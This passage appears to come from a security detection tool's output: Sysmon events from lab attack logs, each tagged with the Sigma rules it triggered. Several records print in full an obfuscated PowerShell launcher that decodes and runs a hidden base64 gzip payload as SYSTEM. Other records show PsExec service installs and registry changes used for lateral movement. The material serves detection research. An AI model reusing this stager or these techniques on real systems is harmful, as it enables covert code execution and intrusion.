IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ParentProcessId":460,"ProcessGuid":"365ABB72-AF8B-5CC8-0000-00101C1A1900","ProcessId":3348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:51.949"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9807,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:26:52.090464Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Mimikatz Command Line","FromBase64String Command Line","Encoded FromBase64String"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-AF8B-5CC8-0000-00101C1A1900","ParentProcessId":3348,"ProcessGuid":"365ABB72-AF8B-5CC8-0000-0010AC1B1900","ProcessId":3872,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:51.965"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9808,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:26:52.106089Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","FromBase64String Command Line","Encoded FromBase64String"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"powershell.exe\" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AF8B-5CC8-0000-0010AC1B1900","ParentProcessId":3872,"ProcessGuid":"365ABB72-AF8C-5CC8-0000-001003361900","ProcessId":2484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:52.356"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9809,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:26:52.356089Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\Start","UtcTime":"2019-04-30 20:26:53.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9812,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:26:53.199839Z"}},"Version":2}}}},{"detection":["PsExec Tool Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-27 11:40:56.396","Image":"System","ProcessGuid":"B5CF5917-721E-5F46-0000-0010EB030000","ProcessId":4,"RuleName":"","TargetFilename":"C:\\Windows\\PSEXESVC.exe","UtcTime":"2020-08-27 11:40:56.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"04246w-win10.threebeesco.com","Correlation":null,"EventID":11,"EventRecordID":263572,"Execution":{"#attributes":{"ProcessID":2580,"ThreadID":4144}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-27T11:40:56.397086Z"}},"Version":2}}}},{"detection":["PsExec Service Start"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\WINDOWS\\PSEXESVC.exe","Company":"Sysinternals","CurrentDirectory":"C:\\WINDOWS\\system32\\","Description":"PsExec Service","FileVersion":"2.2","Hashes":"SHA1=A17C21B909C56D93D978014E63FB06926EAEA8E7,MD5=75B55BB34DAC9D02740B9AD6B6820360,SHA256=141B2190F51397DBD0DFDE0E3904B264C91B6F81FEBC823FF0C33DA980B69944,IMPHASH=67012475995FB9027F4511245B57DDEA","Image":"C:\\Windows\\PSEXESVC.exe","IntegrityLevel":"System","LogonGuid":"B5CF5917-7237-5F46-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\WINDOWS\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"B5CF5917-7236-5F46-0000-001058880000","ParentProcessId":632,"ProcessGuid":"B5CF5917-9BC8-5F47-0000-001042AB2001","ProcessId":4320,"Product":"Sysinternals PsExec","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-27 11:40:56.610"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"04246w-win10.threebeesco.com","Correlation":null,"EventID":1,"EventRecordID":263573,"Execution":{"#attributes":{"ProcessID":2580,"ThreadID":4144}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-27T11:40:56.625194Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-0B9E-5D1D-0000-00100BF40D00","ProcessId":3844,"RuleName":"Lateral Movement - New Named Pipe added to NullSession","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\LanmanServer\\Parameters\\NullSessionPipes","UtcTime":"2019-07-03 20:10:06.459"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8228,"Execution":{"#attributes":{"ProcessID":112,"ThreadID":2084}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-03T20:10:06.475561Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 